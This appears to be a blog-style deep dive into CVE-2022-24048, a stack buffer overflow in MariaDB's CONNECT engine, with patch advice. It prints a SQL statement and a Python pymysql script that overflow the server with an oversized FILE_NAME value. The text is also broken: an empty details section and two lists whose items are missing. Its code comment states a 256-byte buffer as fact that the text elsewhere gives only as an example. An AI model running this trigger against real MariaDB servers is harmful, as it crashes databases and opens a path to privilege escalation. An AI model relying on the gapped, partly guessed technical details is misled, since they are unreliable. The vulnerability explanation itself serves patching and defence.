CVE-2022-24048 - MariaDB CONNECT Storage Engine Stack-based Buffer Overflow Privilege Escalation Exploit Deep Dive

Note: This article is a technical exploration of CVE-2022-24048. It explains the details, how the exploit works, includes example code, and original references. The focus is simplicity and practical understanding.

Summary

CVE-2022-24048 is a serious vulnerability discovered in MariaDB’s CONNECT storage engine. This security flaw allows authenticated local users to gain higher privileges, potentially enabling full control over the MariaDB service by exploiting a stack-based buffer overflow. The problem occurs because MariaDB fails to adequately check user-supplied data sizes before storing it in a fixed-length buffer during SQL query processing.

What is MariaDB CONNECT engine?

MariaDB is a very popular open-source database. Its CONNECT storage engine lets users query and use data from various formats, files, or remote sources as if they were database tables. Unfortunately, this flexibility also introduces complexity — and, in this case, a dangerous security weakness.

Vulnerability Details

- CVE: CVE-2022-24048

References

- MariaDB Security Advisory MDEV-27076
- ZDI Advisory
- Git commit fixing the bug

What Causes CVE-2022-24048?

In short: Insufficient bounds checking.  
When MariaDB processes SQL statements using the CONNECT engine, it copies user input (like file names or table parameters) into a fixed-size buffer on the stack. If input is too big, it overflows the stack buffer.

Exploit idea

If an attacker is authenticated and has permission to create or alter CONNECT tables, they can supply an oversized field to the server. This causes MariaDB to overwrite stack memory, which can:

Step-by-step Exploit Example

WARNING: Running the following steps on a live system will crash and endanger your database! This is for educational/testing purposes only.

Let’s see a *pseudo* SQL snippet that triggers the bug

-- Login as an authenticated user with permissions for the CONNECT engine
CREATE TABLE test_bad (
    name VARCHAR(50)
) ENGINE=CONNECT
TABLE_TYPE=CSV
FILE_NAME='A_VERY_LONG_STRING_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...';

Where 'A_VERY_LONG_STRING_AAA... is much longer than the fixed-size buffer used by the CONNECT handler (for example, more than 255 bytes).

The vulnerability happens because FILE_NAME is copied to a stack buffer without checking its size first.

What happens under the hood?

- MariaDB passes FILE_NAME value to a C/C++ stack buffer.

The buffer is, for example, 256 bytes, but if you give 1024 bytes, it overwrites adjacent memory.

- On many systems, this could allow an attacker to control the *return address* or *saved function pointers*, possibly running injected code.

Exploit Impact

While an attacker needs a valid MariaDB account, on most Linux/Unix systems the MariaDB server runs as a privileged service user (like mysql or mariadb). If an attacker can run code as this user, they can potentially:

Real-World Exploit (Pseudo-CODE)

Note: For ethical reasons, this code is illustrative only.

import pymysql

connection = pymysql.connect(host='localhost', user='attacker', password='pass', database='test')

# Create an extremely long FILE_NAME string to trigger buffer overflow
payload = 'A' * 1024   # Overflows the internal 256-byte buffer

sql = f'''
    CREATE TABLE exploit (a int)
    ENGINE=CONNECT
    TABLE_TYPE=CSV
    FILE_NAME='{payload}';
'''

with connection.cursor() as cursor:
    cursor.execute(sql)
    print("Buffer overflow triggered.")

MariaDB process may crash immediately.

- If special shellcode is used in the payload and system is not using security protections (ASLR, stack protections, etc.), arbitrary code could potentially execute.

How to Stay Safe: Patch Now!

- Upgrade MariaDB to 10.6.8 / 10.5.16 / 10.4.25 / 10.3.35 or later
 - Download latest MariaDB

Conclusion

*CVE-2022-24048* is a classic buffer overflow, but inside a modern, popular database. It can allow an insider or attacker with database credentials to escalate their privileges, destabilize your server, or worse. Always patch and follow the principle of least privilege for special storage engines like CONNECT.

More Links & Reading

- MariaDB Official Changelog
- ZDI Full Advisory for ZDI-CAN-16191
- MariaDB JIRA Bug (MDEV-27076)

If you run MariaDB, protect your data and patch today!

Timeline

Published on: 02/18/2022 20:15:00 UTC
Last modified on: 06/30/2022 19:42:00 UTC